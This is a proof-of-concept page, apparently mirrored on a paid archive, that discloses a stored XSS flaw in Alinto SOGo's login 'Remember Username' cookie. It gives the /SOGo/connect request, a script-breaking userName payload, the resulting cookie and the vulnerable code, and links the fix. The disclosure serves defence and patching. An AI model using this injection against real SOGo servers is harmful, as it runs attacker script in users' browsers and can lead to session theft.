Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CVE-2025-63498 PoC — SOGo 安全漏洞

Source
Associated Vulnerability
Title: SOGo 安全漏洞 (CVE-2025-63498)
Description:alinto SOGo 5.12.3 is vulnerable to Cross Site Scripting (XSS) via the "userName" parameter.
Readme
                                            Stored XSS in cookie Alinto/SOGo 

Researchers: Daniil Khomichenok, Alexander Klimenko

Affected Versions < 5.12.3

Date: 01.10.2025

 **********************************************************************************************
 
When the **"Remember Username"** feature is enabled, a base64-encoded field is added to the browser cookie. 

This value is obtained from the **"userName"** parameter in the **POST** request to the **/SOGo/connect** endpoint.

Server response contains b64 encoded XSS payload with set cookie:

**_Set-Cookie:_ SOGoLogin=dGVzdDIyMkBxYXRlc3Qub2YuYnk8L3NjcmlwdD48c2NyaXB0PmFsZXJ0KCcxMjMnKTwvc2NyaXB0Pg%3D%3D; expires=Sun, 02-Nov-2025 09:58:23 GMT;**

Adding the following value to the POST request for the **"userName"** parameter:

<sub> test222@victim.com</script><script>alert('123')</script> </sub>

which contains a **JavaScript injection** that is **_executed_** when the user revisits the authentication page and is stored in the **_"SOGoLogin"_ cookie in the user's browser**.


Code of Auth page, which contains injection:

    <script type="text/javascript">
    var cookieUsername = "test222@victim.com</script><script>alert('123')</script>";
    var language = 'English';
    var loginHint = ''
    </script>

Code of login remember set-cookie which accepts XSS injections as a paramteter value:

    if (rememberLogin)
      [response addCookie: [self _cookieWithUsername: [params objectForKey: @"userName"]]];
      else
      [response addCookie: [self _cookieWithUsername: nil]];


Fix: https://github.com/Alinto/sogo/commit/9e20190fad1a437f7e1307f0adcfe19a8d45184c
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →